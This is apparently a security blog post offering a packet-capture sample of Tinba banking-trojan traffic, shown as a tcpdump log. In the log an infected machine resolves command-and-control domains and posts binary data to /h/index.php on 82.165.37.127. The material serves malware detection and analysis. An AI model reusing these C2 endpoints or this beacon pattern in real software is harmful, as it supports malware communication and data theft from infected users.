Tinba Tiny Banking Trojan Malware Traffic Sample PCAP Download

By | January 29, 2016

Download Tinba PCAP sample : tinba.pcap

Tinba got its name from its extraordinarily small size – its code is approximately 20 kilobytes in size, a remarkably small number for banking malware. Tinba is a combination of the words tiny andbanker; the same malware is also known as Tinybanker and Zusy.

 

2012-05-09 22:14:39.253725 IP 10.0.2.15.1026 > 8.8.8.8.53: 37388+ A? dakotavolandos.com. (36)
E..@J
……
……….5.,……………dakotavolandos.com…..
2012-05-09 22:14:39.261738 IP 10.0.2.15.1053 > 8.8.8.8.53: 59449+ A? dakotavolandos.com. (36)
E..@J…….
……….5.,<q.9………..dakotavolandos.com…..
2012-05-09 22:14:39.287205 IP 8.8.8.8.53 > 10.0.2.15.1026: 37388 NXDomain 0/1/0 (109)
E….
..@.^<….
….5…u.A………….dakotavolandos.com…………….=.a.gtld-servers.net..nstld.verisign-grs..O..”……… :…Q.
2012-05-09 22:14:39.287372 IP 10.0.2.15.1026 > 8.8.8.8.53: 60686+ A? dakotavolandos.com.hsd1.va.comcast.net. (56)
E..TJ……n
……….5.@~…………..dakotavolandos.com.hsd1.va.comcast.net…..
2012-05-09 22:14:39.287556 IP 8.8.8.8.53 > 10.0.2.15.1053: 59449 NXDomain 0/1/0 (109)
E…….@.^;….
….5…u^..9………..dakotavolandos.com…………….=.a.gtld-servers.net..nstld.verisign-grs..O..”……… :…Q.
2012-05-09 22:14:39.287725 IP 10.0.2.15.1053 > 8.8.8.8.53: 28828+ A? dakotavolandos.com.hsd1.va.comcast.net. (56)
E..TJ……m
……….5.@..p…………dakotavolandos.com.hsd1.va.comcast.net…..
2012-05-09 22:14:39.329482 IP 8.8.8.8.53 > 10.0.2.15.1026: 60686 NXDomain 0/1/0 (136)
E…….@.^…..
….5….n…………..dakotavolandos.com.hsd1.va.comcast.net…………..X.D.dns1.inflow.pa.bo.’.dnsadmin.cable.comcast.com..?….*0….. :….X
2012-05-09 22:14:39.330766 IP 10.0.2.15.1026 > 8.8.8.8.53: 26356+ A? dak1otavola1ndos.com. (38)
E..BJ……~
……….5….f…………dak1otavola1ndos.com…..
2012-05-09 22:14:39.345055 IP 8.8.8.8.53 > 10.0.2.15.1053: 28828 NXDomain 0/1/0 (136)
E…….@.^…..
….5…..ip…………dakotavolandos.com.hsd1.va.comcast.net…………..X.D.dns1.inflow.pa.bo.’.dnsadmin.cable.comcast.com..?….*0….. :….X
2012-05-09 22:14:39.346111 IP 10.0.2.15.1053 > 8.8.8.8.53: 36606+ A? dak1otavola1ndos.com. (38)
E..BJ……}
……….5..{^………….dak1otavola1ndos.com…..
2012-05-09 22:14:39.492631 IP 8.8.8.8.53 > 10.0.2.15.1026: 26356 1/0/0 A 82.165.37.127 (54)
E..R….@.^o….
….5…>.nf…………dak1otavola1ndos.com…………..<..R.%.
2012-05-09 22:14:39.493786 IP 8.8.8.8.53 > 10.0.2.15.1053: 36606 1/0/0 A 82.165.37.127 (54)
E..R….@.^n….
….5…>.I………….dak1otavola1ndos.com…………..<..R.%.
2012-05-09 22:14:39.507647 IP 10.0.2.15.1611 > 82.165.37.127.80: Flags [S], seq 708841482, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0J.@…,.
…R.%..K.P*@.
….p……………
2012-05-09 22:14:39.508160 IP 10.0.2.15.1612 > 82.165.37.127.80: Flags [S], seq 3598850243, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0J.@…,.
…R.%..L.P……..p……………
2012-05-09 22:14:39.612848 IP 82.165.37.127.80 > 10.0.2.15.1611: Flags [S.], seq 64001, ack 708841483, win 65535, options [mss 1460], length 0
E..,….@…R.%.
….P.K….*@..`………….
2012-05-09 22:14:39.612880 IP 10.0.2.15.1611 > 82.165.37.127.80: Flags [.], ack 1, win 64240, length 0
E..(J.@…,.
…R.%..K.P*@……P…….
2012-05-09 22:14:39.613196 IP 10.0.2.15.1611 > 82.165.37.127.80: Flags [P.], seq 1:354, ack 1, win 64240, length 353: HTTP: POST /h/index.php HTTP/1.1
E…J.@…+)
…R.%..K.P*@……P…….POST /h/index.php HTTP/1.1
Host: dak1otavola1ndos.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: identity
Connection: close
Content-Type: application/octet-stream

Content-Length: 13

4.`.
2012-05-09 22:14:39.613393 IP 82.165.37.127.80 > 10.0.2.15.1611: Flags [.], ack 354, win 65535, length 0
E..(….@…R.%.
….P.K….*@.lP….W……..
2012-05-09 22:14:39.613469 IP 10.0.2.15.1611 > 82.165.37.127.80: Flags [P.], seq 354:363, ack 1, win 64240, length 9: HTTP
E..1J.@…,.
…R.%..K.P*@.l….P….[……..ii.
2012-05-09 22:14:39.613661 IP 82.165.37.127.80 > 10.0.2.15.1611: Flags [.], ack 363, win 65535, length 0
E..(….@…R.%.
….P.K….*@.uP….N……..
2012-05-09 22:14:39.626564 IP 82.165.37.127.80 > 10.0.2.15.1612: Flags [S.], seq 128001, ack 3598850244, win 65535, options [mss 1460], length 0
E..,….@…R.%.
….P.L……..`…)………
2012-05-09 22:14:39.626589 IP 10.0.2.15.1612 > 82.165.37.127.80: Flags [.], ack 1, win 64240, length 0
E..(J.@…,.
…R.%..L.P……..P…F…
2012-05-09 22:14:39.626940 IP 10.0.2.15.1612 > 82.165.37.127.80: Flags [P.], seq 1:354, ack 1, win 64240, length 353: HTTP: POST /h/index.php HTTP/1.1
E…J.@…+&
…R.%..L.P……..P…k…POST /h/index.php HTTP/1.1
Host: dak1otavola1ndos.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: identity
Connection: close
Content-Type: application/octet-stream
Content-Length: 13

4.`.
2012-05-09 22:14:39.627155 IP 82.165.37.127.80 > 10.0.2.15.1612: Flags [.], ack 354, win 65535, length 0
E..(….@…R.%.
….P.L…….%P…@Z……..
2012-05-09 22:14:39.627232 IP 10.0.2.15.1612 > 82.165.37.127.80: Flags [P.], seq 354:363, ack 1, win 64240, length 9: HTTP
E..1J.@…,}
…R.%..L.P…%….P…)^……..ii.
2012-05-09 22:14:39.627502 IP 82.165.37.127.80 > 10.0.2.15.1612: Flags [.], ack 363, win 65535, length 0
E..(….@…R.%.
….P.L……..P…@Q……..
2012-05-09 22:14:39.823415 IP 82.165.37.127.80 > 10.0.2.15.1611: Flags [P.], seq 1:233, ack 363, win 65535, length 232: HTTP: HTTP/1.1 200 OK
E…….@…R.%.
….P.K….*@.uP…. ..HTTP/1.1 200 OK
Date: Mon, 04 Jun 2012 11:19:28 GMT
Server: Apache/2.2.16 (Debian)
X-Powered-By: PHP/5.3.13-1~dotdeb.0
Vary: Accept-Encoding
Content-Length: 20
Connection: close
Content-Type: text/html

tinba

Share Button

Leave a Reply

Your email address will not be published. Required fields are marked *